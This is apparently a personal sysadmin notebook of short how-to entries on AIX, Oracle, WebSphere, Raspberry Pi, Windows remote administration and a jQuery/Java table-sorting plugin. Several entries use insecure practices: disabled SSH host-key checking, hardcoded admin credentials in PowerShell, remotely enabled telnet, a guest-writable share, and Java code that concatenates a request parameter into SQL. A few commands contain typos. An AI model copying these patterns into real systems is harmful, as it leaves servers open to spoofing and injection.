ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no felix@remoteIP (disable host key checking)

run puttygen.exe to convert id_rsa to putty's format
run pageant.exe to load private key
plink.exe felix@remoteIP
config as enable X11 forwarding in putty, and save the session as passwordless.
plink.exe -load passwordless

Reference

http://linuxcommando.blogspot.hk/2008/10/how-to-disable-ssh-host-key-checking.html
http://www.cnblogs.com/cheche/archive/2011/01/07/1918825.html

2013-01-30

2013-01-30

putty for X11 forwarding

Install Xming && Xming-fonts
sed -i 's/#X11Forwarding no/X11Forwarding yes/g' /etc/ssh/sshd_config
stopsrc -s sshd && startpsrc -s sshd
Run XLaunch.exe or Xming.exe (XLaunch.exe can be used as mutilwindow)
Run putty
Enable X11 forwarding
X display location -> localhost:0
/usr/java6/bin/jconsole

Reference:

http://www.cs.nctu.edu.tw/help/xming.html
http://www.math.umn.edu/systems_guide/putty_xwin32.html

2013-01-12

2013-01-12

Light LED in Raspberry Pi

Command

login as root: su - root
connect gpio 17 pin and GND pin
echo 17 > /sys/class/gpio/export
echo out > /sys/class/gpio/direction
echo 1 > /sys/class/gpio/value # LED bright
echo 0 > /sys/class/gpio/value # LED dim
echo 17 > /sys/class/gpio/unexport

WiringPi

1
2
3

gpio mode 0 out
gpio write 0 1
gpio write 0 0

WiringPi-python

sudo get-apt install python-dev python-pip
sudo pip install wiringpi
or
sudo esay_install-2.7 wiringpi
blink.py
import wiringpi
io = wiringpi.GPIO(wiringpi.WPI_MODE_SYS)
io.pinMode(17,io.OUTPUT)
io.digitalWrite(18,io.HIGH)  # Turn on light
io.digitalWrite(18,io.LOW)  # Turn off

Reference

https://github.com/Gadgetoid/WiringPi2-Python
http://wiringpi.com/

2013-01-10

2013-01-10

ORA-01000 maximum open cursors exceeded

Get detail of opened cursors current

select * from gv$sysstat where name like '%open%'

select sum(a.value) total_cur, avg(a.value) avg_cur, max(a.value) max_cur,
s.username, s.machine
from gv$sesstat a, gv$statname b, gv$session s
where a.statistic# = b.statistic#  and s.sid=a.sid
and b.name = 'opened cursors current'
group by s.username, s.machine
order by 1 desc;

Update open_cursors

1
2
3

show parameter open_cursors;

alter system set open_cursors=1000 scope=MEMORY; (如果启动时候定义了spfile,可以写scope=BOTH)

Kill session to let the parameter take effect

select
       substr(a.spid,1,9) pid,
       substr(b.sid,1,5) sid,
       substr(b.serial#,1,5) ser#,
       substr(b.machine,1,6) box,
       substr(b.username,1,10) username,
--       b.server,
       substr(b.osuser,1,8) os_user,
       substr(b.program,1,30) program
from gv$session b, gv$process a
where
b.paddr = a.addr
and type='USER'
order by program, sid;

alter system kill session 'SID,SERIAL#'
e.g. alter system kill session '12,2653'

参考

http://superlee0815.blog.163.com/blog/static/10575132120091585954516/
http://blog.itpub.net/9399028/viewspace-695082
https://community.oracle.com/thread/362096

2012-12-21

2012-12-21

List grantee right in oracle

create user xx identified by password;

grant create session to xx;
grant select on USER to xx;
grant select on PAYMENT to xx;
grant select on COMPANY to xx;

select * from user_tab_privs where grantee = 'xx'

select * from sys.all_tables;
select * from sys.all_synonyms;
select * from sys.all_views;

2012-11-28

2012-11-28

Show Info about MSSQL Server

Show all tables

select * from information_schema.tables

Show user privilege

1 2	SELECT * FROM INFORMATION_SCHEMA.TABLE_PRIVILEGES exec sp_helprotect

Change password of sa

1
2
3

osql -S yourservername -E
1> EXEC sp_password NULL, 'yourpassword', 'sa'
2> GO

2012-11-23

2012-11-23

dds4 and tsm backup

Backup

find /tmp/forest | backup -ivqf /dev/rmt0

Commands of controlling DDS4 tape

1 2	mt -t /dev/rmt0 rewind mt -t /dev/rmt0 offline

Daily backup:

Backup /dh/db/bkup/exp/exp_ora_{dow}.dmp.gz

restore -Tvqf /dev/rmt0 (View)
restore -Tqdvf /dev/rmt0 /dh/db/bkup/exp
restore -rvqf /dev/rmt0 (Restore)
restore -xvqf /dev/rmt0
restore -xdvqf /dev/rmt0 /dh/db/bkup/exp

Weekly backup(system backup):

1
2
3

restore -s4 -Tvqf /dev/rmt0.1 (View)
lsmksysb -f /dev/rmt0
restore -s4 -rvqf /dev/rmt0.1 (Restore)

http://www.oucs.ox.ac.uk/hfs/backup/allcli/index.xml?splitLevel=-1

dsmc restore /dh/db/bkup/exp/exp_ora_1.dmp.gz
dsmc restore /dh/db/bkup/exp/exp_ora_1.dmp.gz /tmp/xx/
dsmc restore /dh/db/bkup/exp/* /tmp/xx/
dsmc query file
dsmc query backup "/dh/db/bkup/*" -subdir=yes
dsmc q ba "/dsmdb/bkup/exp/*" -subdir=yes (-inactive)
dsmc q ba "/dh/db/bkup/arch/*" -su=yes

2012-11-20

2012-11-20

System Performance Statistics Report Summary

statpack

1 2	ls -lt /sharedrive/data/statpack_result \| grep MM /sharedrive/scripts/perfstat/spreport.sh MM

sqlplus perfstat/password@"(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=DBServer)(PORT=1521))(CONNECT_DATA=(SERVICE_NAME=xxrac)))"
@$ORACLE_HOME/rdbms/admin/spreport.sql
@?/rdbms/admin/spreport.sql
@$ORACLE_HOME/rdbms/admin/sppurge.sql

find max, min snap_id

1
2
3

select startup_time, count(1) from STATS$snapshot where snap_time between to_date('2014-11-01', 'yyyy-mm-dd') and to_date('2014-11-30', 'yyyy-mm-dd') group by startup_time;

select * from STATS$snapshot where snap_time between to_date('2014-11-01', 'yyyy-mm-dd') and to_date('2014-11-30', 'yyyy-mm-dd') and to_char(startup_time, 'yyyy-mm-dd hh24:mi:ss') = '2014-10-16 18:42:52' order by snap_id;

http://burleson-dba.com/SP/

performance statistic

/aix-combine-csv-daily-to-csv-month-parameter.sh Server 2015 07
/aix-calc-monthly-avg.sh Server 2015 07 
/aix-calc-monthly-avg.sh Server 2015 07 | awk  -F ','  '{print $2","$4"M"}'
/aix-calc-monthly-avg.sh Server 2015 07 | awk  -F ','  '{print $2","$5"%"}'

select df.tablespace_name "Tablespace",
round(100 * ( (df.totalspace - tu.totalusedspace)/ df.totalspace)) || '%'
"Pct. Free"
from
(select tablespace_name,
round(sum(bytes) / 1048576) TotalSpace
from dba_data_files 
group by tablespace_name) df,
(select round(sum(bytes)/(1024*1024)) totalusedspace, tablespace_name
from dba_segments 
group by tablespace_name) tu
where df.tablespace_name = tu.tablespace_name order by df.tablespace_name ;

WEB server

D:\perfstat-bin\convert\relog-daily-blg-to-monthly-csv.bat 201501
./relog-daily-blg-to-monthly-csv.bat 201501
check D:\perfstat-csv

cd /cygdrive/d/perfstat-bin/convert
relog ../../PerfLogs/Web_201506*.blg -cf relog-parameters.txt -f csv -o ../../perfstat-csv/Web_201506.csv

2012-11-14

2012-11-14

Websphere deployment with script

$AdminApp install "/tmp/xx/session_replication/weiwei.ear" {-contextroot weiwei -appname WeiWeiEAR -node psuat -cell psuat -server server4 -MapWebModToVH {{"weiwei" weiwei.war,WEB-INF/web.xml default_host}} -MapResRefToEJB {{weiwei "" weiwei.war,WEB-INF/web.xml jdbc/psuat javax.sql.DataSource jdbc/psuat}} -MapModulesToServers {{weiwei weiwei.war,WEB-INF/web.xml WebSphere:cell=psuat,node=psuat,server=server4}} -installdir /piers/apps/uat/installedApps -verbose -nodeployws} 
$AdminApp install "/tmp/xx/weiwei.ear" {-contextroot weiwei -appname WeiWeiEAR -MapWebModToVH {{"weiwei" weiwei.war,WEB-INF/web.xml default_host}} -MapResRefToEJB {{weiwei "" weiwei.war,WEB-INF/web.xml jdbc/dhprd javax.sql.DataSource jdbc/dhprd}} -MapModulesToServers {{weiwei weiwei.war,WEB-INF/web.xml WebSphere:cell=dhwap02Network,cluster=dhwas_cluster}} -installdir /xx/apps/prod/installedApps -cluster xx_was -verbose -nodeployws} 

$AdminConfig save 
$AdminApp isAppReady sr 
$AdminApp getDeployStatus sr 

$AdminApp list 
$AdminApp listModules sr 

set appManager [$AdminControl queryNames type=ApplicationManager,*] 
$AdminControl invoke $appManager startApplication sr 
$AdminControl invoke $appManager stopApplication sr 

$AdminApp uninstall sr 

$AdminApp options /piers/apps/uat/installedApps/WeiWeiEAR.ear 
$AdminApp taskInfo /piers/apps/uat/installedApps/WeiWeiEAR.ear MapResRefToEJB 
$AdminApp taskInfo /piers/apps/uat/installedApps/WeiWeiEAR.ear MapModulesToServers 
$AdminApp taskInfo /piers/apps/uat/installedApps/WeiWeiEAR.ear MapWebModToVH 
$AdminApp taskInfo /piers/apps/uat/installedApps/eps.ear AppDeploymentOptions 


$AdminControl queryNames "*:*"

2012-10-31

2012-10-31

Raspberry Practice

Run raspi-config to set parameter
Login as pi/raspberry, sudo passwd root
Run sudo vi /boot/config.txt to set framebuffer
Install JDK1.8.0 and run javafx samples http://javafx.steveonjava.com/javafx-on-raspberry-pi-3-easy-steps
Install Tomcat
Install TightVNC raspberry-pi-beginners-guide tightvnc
Install transmission-daemon, transmission-remote-gui/java remember to disable rpc-white-list and set the login user/password pt-linux-vps setting-up-transmission-remote-gui-in

Install samba sudo apt-get install samba
/etc/samba/smb.conf

[bt-download]
comment = transmission download folder
browsable = yes
path = /var/lib/transmission-daemon/downloads
public = yes
writable = yes
guest ok = yes

Install chromium sudo apt-get install chromium
Install wiringPi https://projects.drogon.net/raspberry-pi/wiringpi/download-and-install
Install xrdp (ru tightvncserver in backend imho) sudo apt-get install xrdp
Install bluetooth sudo apt-get install bluez blueman
Install mpd sudo apt-get install mpd mpc icecast2
set bind_to_address to 0.0.0.0 in mpd.conf
uncomment the block Icecast of audio_output
streaming-audio-with-mpd-and-icecast2-on-raspberry-pi
Install Pifm Turning_the_Raspberry_Pi_Into_an_FM_Transmitter
check revision cat /proc/cpuinfo http://elinux.org/RPi_Hub And http://rpitc.blogspot.hk/

Reference

http://whatswhat.no/computer/linux/raspberry-pi/481-raspberry-pi-mediacenter-raspbmc-setup-and-use-ipad-or-iphone-as-remote
http://blog.thestateofme.com/2012/05/27/raspberry-pi-on-ipad/
http://www.oracle.com/technetwork/articles/java/raspberrypi-1704896.html

http://projectdp.wordpress.com/2012/09/24/pi-k3w-kindle-3-display-for-raspberry-pi/
http://www.raspberrypi.org
https://www.riscosopen.org/news/articles/2012/10/26/risc-os-pi-released-risc-os-for-the-raspberry-pi
http://www.reddit.com/r/raspberry_pi/comments/zoivv/kindleberry_pi/

2012-10-31

2012-10-31

Resetting warning light on AIX

Method 1

as root, run ‘diag’
then select ‘Task Selection’
then select ‘Identify and Attention Indicators’
then select ‘Set ALL Identify Indicators to NORMAL’ or selectivly as required.

Method 2

usr/lpp/diagnostics/bin/usysfault -t
/usr/lpp/diagnostics/bin/usysfault -s normal

Reference:

http://unix.ittoolbox.com/groups/technical-functional/ibm-aix-l/resetting-warning-light-on-rs6000-2934655

2012-10-19

2012-10-19

在AIX上增加文件系统空间

显示活动的卷组

dhdev01 / # lsvg -o
bkvg
vg01
vg02
rootvg
列出对应的物理卷
dhdev01 / # lsvg -p rootvg
rootvg:
PV_NAME           PV STATE          TOTAL PPs   FREE PPs    FREE DISTRIBUTION
hdisk0            active            546         111         00..00..00..02..109
dhdev01 / # lsvg -p vg01
vg01:
PV_NAME           PV STATE          TOTAL PPs   FREE PPs    FREE DISTRIBUTION
hdisk1            active            546         135         00..00..00..26..109
dhdev01 / # lsvg -p vg02
vg02:
PV_NAME           PV STATE          TOTAL PPs   FREE PPs    FREE DISTRIBUTION
hdisk2            active            546         109         00..00..00..00..109


dhdev01 / # ls -al /dev/rootvg
crw-rw----   1 root     system       10,  0 Dec 19 2003  /dev/rootvg

显示卷组的基本信息

dhdev01 / # lsvg rootvg
VOLUME GROUP:   rootvg                   VG IDENTIFIER:  00585c0f00004c00000000f98e1e377f
VG STATE:       active                   PP SIZE:        128 megabyte(s)
VG PERMISSION:  read/write               TOTAL PPs:      546 (69888 megabytes)
MAX LVs:        256                      FREE PPs:       111 (14208 megabytes)
LVs:            16                       USED PPs:       435 (55680 megabytes)
OPEN LVs:       13                       QUORUM:         2
TOTAL PVs:      1                        VG DESCRIPTORS: 2
STALE PVs:      0                        STALE PPs:      0
ACTIVE PVs:     1                        AUTO ON:        yes
MAX PPs per PV: 1016                     MAX PVs:        32
LTG size:       128 kilobyte(s)          AUTO SYNC:      no
HOT SPARE:      no                       BB POLICY:      relocatable

显示该卷组存在的所有逻辑卷

dhdev01 / # lsvg -l rootvg
rootvg:
LV NAME             TYPE       LPs   PPs   PVs  LV STATE      MOUNT POINT
hd5                 boot       1     1     1    closed/syncd  N/A
hd6                 paging     32    32    1    open/syncd    N/A
hd8                 jfslog     1     1     1    open/syncd    N/A
hd4                 jfs        3     3     1    open/syncd    /
hd2                 jfs        88    88    1    open/syncd    /usr
hd9var              jfs        8     8     1    open/syncd    /var
hd3                 jfs        22    22    1    open/syncd    /tmp
hd1                 jfs        8     8     1    open/syncd    /home
hd10opt             jfs        3     3     1    open/syncd    /opt
lg_dumplv           sysdump    8     8     1    open/syncd    N/A
lv00                jfs        148   148   1    open/syncd    /u01
lv01                jfs        24    24    1    open/syncd    /u02
lv02                jfs        24    24    1    open/syncd    /oradisk
dh                  jfs        32    32    1    open/syncd    /dh
loglv03             jfs2log    1     1     1    closed/syncd  N/A
fslv00              jfs2       32    32    1    closed/syncd  /cd0

显示所有物理卷的基本信息

dhdev01 / # lspv
hdisk0          00585c0f8e1e2d11                    rootvg          active
hdisk1          00585c0f746525a4                    vg01            active
hdisk2          00585c0f545aca55                    vg02            active
hdisk3          00585c0f418e185b                    bkvg            active

显示某个物理卷的基本信息

dhdev01 / # lspv hdisk0
PHYSICAL VOLUME:    hdisk0                   VOLUME GROUP:     rootvg
PV IDENTIFIER:      00585c0f8e1e2d11 VG IDENTIFIER     00585c0f00004c00000000f98e1e377f
PV STATE:           active
STALE PARTITIONS:   0                        ALLOCATABLE:      yes
PP SIZE:            128 megabyte(s)          LOGICAL VOLUMES:  16
TOTAL PPs:          546 (69888 megabytes)    VG DESCRIPTORS:   2
FREE PPs:           111 (14208 megabytes)    HOT SPARE:        no
USED PPs:           435 (55680 megabytes)
FREE DISTRIBUTION:  00..00..00..02..109
USED DISTRIBUTION:  110..109..109..107..00

显示该物理卷上存在的所有逻辑卷

dhdev01 / # lspv -l hdisk0
hdisk0:
LV NAME               LPs   PPs   DISTRIBUTION          MOUNT POINT
hd5                   1     1     01..00..00..00..00    N/A
lv00                  148   148   53..43..17..35..00    /u01
dh                    32    32    32..00..00..00..00    /dh
lv02                  24    24    24..00..00..00..00    /oradisk
hd6                   32    32    00..32..00..00..00    N/A
lg_dumplv             8     8     00..08..00..00..00    N/A
lv01                  24    24    00..16..08..00..00    /u02
hd2                   88    88    00..10..65..13..00    /usr
hd8                   1     1     00..00..01..00..00    N/A
hd4                   3     3     00..00..01..02..00    /
hd9var                8     8     00..00..04..04..00    /var
hd3                   22    22    00..00..06..16..00    /tmp
hd1                   8     8     00..00..06..02..00    /home
hd10opt               3     3     00..00..01..02..00    /opt
loglv03               1     1     00..00..00..01..00    N/A
fslv00                32    32    00..00..00..32..00    /cd0

如果卷组内只有一个物理卷，那么卷组内的逻辑卷信息和物理卷内的逻辑卷信息是一致的。

显示物理卷中的每个物理分区(outer edge, outer middle, center, inner middle, inner edge)

dhdev01 / # lspv -p hdisk1
hdisk1:
PP RANGE  STATE   REGION        LV NAME             TYPE       MOUNT POINT
  1-32    used    outer edge    db                  jfs        /dh/db
 33-36    used    outer edge    rdhdev_test2        raw        N/A
 37-74    used    outer edge    testdb              jfs        /test
 75-110   used    outer edge    rdhdev_test         raw        N/A
111-190   used    outer middle  db                  jfs        /dh/db
191-191   used    outer middle  loglv00             jfslog     N/A
192-219   used    outer middle  patch               jfs        /opt/patch
220-223   used    center        patch               jfs        /opt/patch
224-261   used    center        testdb2             jfs        /test2
262-281   used    center        db                  jfs        /dh/db
282-287   used    center        patch               jfs        /opt/patch
288-328   used    center        db                  jfs        /dh/db
329-409   used    inner middle  db                  jfs        /dh/db
410-410   used    inner middle  lv03                raw        N/A
411-411   used    inner middle  rawtest             raw        N/A
412-437   free    inner middle
438-546   free    inner edge

显示某个逻辑卷的信息

dhdev01 / # lslv hd1
LOGICAL VOLUME:     hd1                    VOLUME GROUP:   rootvg
LV IDENTIFIER:      00585c0f00004c00000000f98e1e377f.8 PERMISSION:     read/write
VG STATE:           active/complete        LV STATE:       opened/syncd
TYPE:               jfs                    WRITE VERIFY:   off
MAX LPs:            512                    PP SIZE:        128 megabyte(s)
COPIES:             1                      SCHED POLICY:   parallel
LPs:                8                      PPs:            8
STALE PPs:          0                      BB POLICY:      relocatable
INTER-POLICY:       minimum                RELOCATABLE:    yes
INTRA-POLICY:       center                 UPPER BOUND:    32
MOUNT POINT:        /home                  LABEL:          /home
MIRROR WRITE CONSISTENCY: on/ACTIVE
EACH LP COPY ON A SEPARATE PV ?: yes
Serialize IO ?:     NO
dhdev01 / # df -g
Filesystem    GB blocks      Free %Used    Iused %Iused Mounted on
/dev/hd4           0.38      0.23   40%     3349     2% /
/dev/hd2          11.00      2.45   78%   108362     4% /usr
/dev/hd9var        1.00      0.48   52%      816     1% /var
/dev/hd3           2.75      1.87   33%    10855     2% /tmp
/dev/hd1           1.00      0.46   55%     4222     2% /home
/proc                 -         -    -         -     -  /proc
/dev/hd10opt       0.38      0.17   56%     3987     5% /opt
/dev/lv00         18.50      2.15   89%    97608     3% /u01
/dev/lv01          3.00      0.70   77%       36     1% /u02
/dev/lv02          3.00      2.91    4%       17     1% /oradisk
/dev/dh            4.00      2.56   36%    69153     7% /dh
/dev/db           31.75     18.40   43%       57     1% /dh/db
/dev/patch         4.75      0.26   95%     7607     1% /opt/patch
/dev/piers         4.38      0.92   80%    27870     3% /piers
/dev/piersdb      12.50      1.44   89%       55     1% /piers/db
/dev/uatbkup      19.75     19.03    4%       30     1% /piers/db/uatbkup
/dev/dailybkup      9.88      7.33   26%     2450     1% /piers/dailybkup
/dev/dbbkuplv     40.00     13.42   67%    91429     3% /dbbkup

PP SIZE * PPs(128 megabyte(s) * 8) == 1024M
表示逻辑卷hd1(Filesystem: /dev/hd1, Mounted on: /home)有1.00 GB blocks

查看逻辑卷在物理卷上的分布

dhdev01 / # lslv -l hd1
hd1:/home
PV                COPIES        IN BAND       DISTRIBUTION
hdisk0            008:000:000   75%           000:000:006:002:000


dhdev01 / # lslv -m hd1
hd1:/home
LP    PP1  PV1               PP2  PV2               PP3  PV3
0001  0225 hdisk0
0002  0241 hdisk0
0003  0242 hdisk0
0004  0309 hdisk0
0005  0310 hdisk0
0006  0311 hdisk0
0007  0336 hdisk0
0008  0413 hdisk0
dhdev01 / # lspv -p hdisk0|grep /home
225-225   used    center        hd1                 jfs        /home
241-242   used    center        hd1                 jfs        /home
309-311   used    center        hd1                 jfs        /home
336-336   used    inner middle  hd1                 jfs        /home
413-413   used    inner middle  hd1                 jfs        /home

说明：
DISTRIBUTION(000:000:006:002:000) 表示center有6个物理分区(对应第1-6的逻辑分区)，inner middle有2个物理分区(对应7-8的逻辑分区)
COPIES(008:000:000) 表示第一个物理卷上有8个物理分区，没有第二和第三的拷贝分区
IN BAND(75%) 表示center[6] / center[6] + inner middle[2] = 0.75

增加某个文件系统的空间

df -g | grep /home 查看/home所属的逻辑卷，假设是hd1
lslv -l hd1 查看hd1所属的物理卷，假设是hdisk0
lspv -p hdisk0 查看物理卷的可用空间
smitty chfs 或者 chfs -a size=+10G /home
如果执行上述命令时出现问题:Maximum allocation for logical volume hd1，运行命令
chlv -x 800 hd1 或 smitty chlv 或 smitty lv
Please refer to how-to-expand-a-filesystem-in-aix-df-lsvg-chfs or practical-guide-to-aix-logical-volume-management
extendlv与chfs是很接近的，但增加文件空间需要用chfs，不要用extendlv，因为extendlv会扩大逻辑分区，但不能反映的文件空间上的。

参考:

http://www.web-manual.net/aix/0516-787-extendlv-maximum-allocation-for-logical-volume-hd11admin-is-512/
http://wenku.baidu.com/view/f02cac4533687e21af45a960.html
http://unix.ittoolbox.com/groups/technical-functional/ibm-aix-l/in-band-in-lslv-l-1110087
http://unix.ittoolbox.com/groups/technical-functional/ibm-aix-l/increasing-the-filesystem-size-2639934
http://www.tek-tips.com/viewthread.cfm?qid=1150552
http://www.unix.com/aix/25249-increase-logical-partition.html

In-band解释

http://unix.ittoolbox.com/groups/technical-functional/ibm-aix-l/in-band-in-lslv-l-1110087
http://pic.dhe.ibm.com/infocenter/powersys/v3r1m5/index.jsp?topic=/iphcg/lslv.htm
http://www.ibm.com/developerworks/forums/thread.jspa?messageID=14532561

extendlv与chfs的区别

http://networktechnologist.com/tips-aix-lvm.html
http://publib.boulder.ibm.com/infocenter/pseries/v5r3/index.jsp?topic=/com.ibm.aix.cmds/doc/aixcmds2/extendlv.htm

2012-10-11

2012-10-11

NTP setting on AIX and Windows

AIX:

Server side(10.13.135.72)

vi /etc/ntp.conf

broadcastclient
server 127.127.1.0 prefer
driftfile /etc/ntp.drift
tracefile /etc/ntp.trace

startsrc -s xntpd
lssrc -ls xntpd

Client side(10.13.135.71)

Method 1:

vi /etc/ntp.conf

broadcastclient
server 10.13.135.71
driftfile /etc/ntp.drift
tracefile /etc/ntp.trace

startsrc -s xntpd
lssrc -ls xntpd

Method 2:

1
2
3

ntpdate 10.13.135.72
crontab -e
0 5,12 * * * ntpdate 10.13.135.72

Windows Client

w32tm /stripchart /computer:10.13.135.72 /samples:2 /dataonly
w32tm /config /syncfromflags:manual /manualpeerlist:10.13.135.72
w32tm /config /update
net stop w32time
net start w32time

Ref:

http://www-01.ibm.com/support/docview.wss?uid=isg3T1000653
http://www.aixchina.net/club/thread-1630-1-1.html
http://www.wretch.cc/blog/jerry0822/13996334
http://technet.microsoft.com/zh-cn/library/cc773263(v=ws.10).aspx

2012-09-26

2012-09-26

misc of command

Windows get uptime

net stats srv|findstr
systeminfo | find "System Boot Time:"
eventvwr.msc -> filter EventID(6005)

Control a service

net start tlntsvr
sc \\hostname start tlntsvr

Enable telnet service

$tlntsvr = gwmi -ComputerName webserver -Class Win32_Service -filter "name='tlntsvr'" -Credential $cred

$tlntsvr.ChangeStartMode("Manual") (default it is Disabled)

$tlntsvr.StartService()

$ihs = gwmi -ComputerName webserver -Class Win32_Service -filter "name like 'IBM%1.3%'" -Credential $cred

Enable remote desktop

$terminalService = gwmi -Class Win32_TerminalServiceSetting -Namespace root\cimv2\terminalservices -ComputerName webserver -Credential $cred //Windows Vista and Windows Server 2008

$terminalService = gwmi -Class Win32_TerminalServiceSetting -Namespace root\cimv2 -ComputerName webserver -Credential $cred //Windows XP and Windows Server 2003

$terminalService.AllowTsConnections // test the state

$terminalService.SetAllowTSConnections(1)

View eventlog by powershell

$username = "admin"
$password = "password"
$secstr = New-Object -TypeName System.Security.SecureString
$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}
$cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr

$time = [System.Management.ManagementDateTImeConverter]::ToDmtfDateTime((Get-Date).AddHours(-72))

gwmi Win32_NTLogEvent -filter "(LogFile='System') AND (Type='Error') AND (TimeWritten >= '$time')" -computer webserver -credential $cred | ft EventCode, EventType, Message -auto

Open remote server path net use \\webserver\ipc$ password /user:username \\werbserver\c$

Reference

http://ss64.com/nt/sc.html
http://www.petri.co.il/check-uptime-in-server-2008.htm"

2012-09-25

2012-09-25

oracle archive log

to check setting about archive log

sqlplus /nolog
conn /as sysdba

SQL>archive log list
SQL>show parameter archive

sql>select * from v$archive_processes;
sql>select log_mode from v$database;
sql>select archiver from v$instance

sql>select group#,members,sequence#,archived,status,first_change#,to_char(first_time, 'yyyy-mm-dd hh24:mi:ss')  first_change_time from v$log;
sql>select name,sequence#,archived,status,first_change#, to_char(first_time, 'yyyy-mm-dd hh24:mi:ss') first_change_time from v$archived_log;

SQL>select * from V$BACKUP_REDOLOG;
SQL>select * from V$archive_dest;

to clean archive log

1 2	rman target / (rman target sys/sys@dbname more than one instance) RMAN>list archivelog all;

method 1：
RMAN>delete archivelog until time 'sysdate-1';

method 2：

mv arch_1_1234.arc /tmp
RMAN>crosscheck archivelog all;
RMAN>list expired archivelog all;
RMAN>delete expired archivelog all;

Reference

http://www.cumt.org/blog/585
http://www.cnblogs.com/woody-wu/archive/2009/08/23/1552372.html

2012-09-04

2012-09-04

Block CONNECT method in httpd.conf

RewriteEngine on
RewriteCond %{REQUEST_METHOD} ^(CONNECT|TRACE)$
RewriteRule ^.*$ - [L,F]
ProxyRequests Off

ProxyRequest should be set to off, unless you have security protect in your web server.

2012-08-17

2012-08-17

IBM HTTP Server & Websphere Plugin

Understanding the WebSphere Application Server Web server plug-in

http://public.dhe.ibm.com/software/dw/wes/pdf/WASWebserverplug-in.pdf

Understanding IBM HTTP Server plug-in Load Balancing in a clustered environment

http://www-01.ibm.com/support/docview.wss?rs=180&uid=swg21219567

Best Practice: WebSphere HTTP Plugin Failover for High Volume Web Sites

http://www.ibm.com/developerworks/websphere/library/bestpractices/plugin_failover_hvws.html

Understanding HTTP plug-in failover in a clustered environment

http://www-01.ibm.com/support/docview.wss?uid=swg21219808

How do the properties ServerIOTimeout and PostBufferSize affect plug-in behavior

http://www-01.ibm.com/support/docview.wss?uid=swg21408884
https://www.ibm.com/developerworks/mydeveloperworks/blogs/Dougclectica/entry/websphere_session_ids22?lang=en

2012-07-20

2012-07-20

jQuery Sorting Plugin

xxAction()

pubilc void xxAction(){
  String orderBy = request.getParameter("orderBy");
  System.out.println("orderBy " + orderBy);

  String sql = "select x.a, x.b from xx";

  if (orderBy != null && orderBy.length() > 0) {
    sql += " order by "
        + fieldSort.getSortBy()
        + (fieldSort.getAsc().equals(Boolean.TRUE) ? " asc"
            : " desc");
  } else {
    orderBy = "xx";
    sql += " order by " + orderBy;

    request.setAttribute("sortBy", orderBy);
    request.setAttribute("order", "up");
    fieldSort.setAsc(Boolean.TRUE);
    fieldSort.setSortBy(orderBy);
  }
}

FieldSort.java

import java.io.Serializable;

import javax.servlet.http.HttpServletRequest;

public class FieldSort implements Serializable {

  private static final long serialVersionUID = 5877056172946099482L;
  private String sortBy;
  private Boolean asc;

  private FieldSort() {

  }

  public String getSortBy() {
    return sortBy;
  }

  public void setSortBy(String sortBy) {
    this.sortBy = sortBy;
  }

  public Boolean getAsc() {
    return asc;
  }

  public void setAsc(Boolean asc) {
    this.asc = asc;
  }

  public static FieldSort createSorting(HttpServletRequest request,
      String orderBy, String className) {
    String orderKey = className + "lastFieldSort";
    Object lastFieldSort = request.getSession().getAttribute(orderKey);
    FieldSort fieldSort = null;

    if (lastFieldSort == null) {
      fieldSort = new FieldSort();
      fieldSort.setSortBy(orderBy);
      fieldSort.setAsc(Boolean.TRUE);
    } else {
      fieldSort = (FieldSort) lastFieldSort;

      if (fieldSort.getSortBy() != null
          && fieldSort.getSortBy().equals(orderBy)) {
        if (fieldSort.getAsc().equals(Boolean.TRUE)) {
          fieldSort.setAsc(Boolean.FALSE);
        } else {
          fieldSort.setAsc(Boolean.TRUE);
        }
      } else {
        fieldSort.setSortBy(orderBy);
        fieldSort.setAsc(Boolean.TRUE);
      }
    }

    request.setAttribute("sortBy", fieldSort.getSortBy());
    request.getSession().setAttribute(orderKey, fieldSort);
    if (fieldSort.getAsc().equals(Boolean.FALSE)) {
      request.setAttribute("order", "down");
    } else {
      request.setAttribute("order", "up");
    }

    return fieldSort;
  }
}

jquery.sortingTable.js

(function($) {
  $.fn.sortingTable = function(options){
    $("head").append("<style type='text/css'>.link { cursor: pointer})</style>");

    var opts = $.extend({}, $.fn.sortingTable.defaults, options);

    var tableId = this.attr('id');
    var formName = opts.formName;

    $("form[name='" + formName + "']").append('<input type="hidden" name="orderBy" value="">');

    if( opts.sortColumns.length > 0 ){
      $.each(opts.sortColumns, function(col){
        $('#' + tableId + " thead th:eq(" + (col - 1) +")").addClass("link");
      });
    }else if(opts.excludeSortColumns.length == 0) {
      this.find("thead th").addClass("link");
    }

    if( opts.excludeSortColumns.length > 0 ){
      this.find('thead th').each(function(index, dom){
        if($.inArray((index + 1), opts.excludeSortColumns) == -1){
          $(this).addClass("link");
        }
      });
    }


    this.find("thead th").each(function(){
      if( $(this).hasClass("link") ) {
        $(this).click(function(){
          var id = $(this).attr('id');
          $(":hidden[name='orderBy']").val(id);

          var form = $("form[name='" + formName + "']");
          form.submit();
        });
      }
    });

    sorting(this, opts.sortBy, opts.order);

    $.each(opts.mergeColumns, function(num){
      _w_table_rowspan('#' + tableId, num);
    });
  };


  var sorting = function(table, sortBy, order){
    var position = 0;
    var header = '';
    table.find("thead th").each(function(index, dom){
      if(sortBy == $(dom).attr('id')){
        position = index;
        header = $(dom).text();
      }
    });

    table.find("thead th:eq(" + position + ")").html("<font color='yellow'>" + header + "</font>&nbsp;<img src='images/arrow_" + order + ".gif'/>");
  }

  var _w_table_rowspan = function(_w_table_id,_w_table_colnum){
    _w_table_firsttd = "";
    _w_table_currenttd = "";
    _w_table_SpanNum = 0;
    _w_table_Obj = $(_w_table_id + " tr td:nth-child(" + _w_table_colnum + ")");
    _w_table_Obj.each(function(i){
       if(i==0){
           _w_table_firsttd = $(this);
           _w_table_SpanNum = 1;
       }else{
           _w_table_currenttd = $(this);
           if(_w_table_firsttd.text()==_w_table_currenttd.text()){
                //var firstSection = _w_table_firsttd.parent().find('td:eq(4)').text();
                //var currentSection = _w_table_currenttd.parent().find('td:eq(4)').text();

                 _w_table_SpanNum++;
                 _w_table_currenttd.hide(); //remove();
                 _w_table_firsttd.attr("rowSpan",_w_table_SpanNum);
           }else{
               _w_table_firsttd = $(this);
               _w_table_SpanNum = 1;
           }
       }
   });
  }

  $.fn.sortingTable.defaults = {
    formName: 'form1',
    sortBy: '',
    order: 'asc',
    sortColumns: [],
    excludeSortColumns: [],
    mergeColumns: []
  };
})(jQuery)

xx.html

<script type="text/javascript">
$(function(){
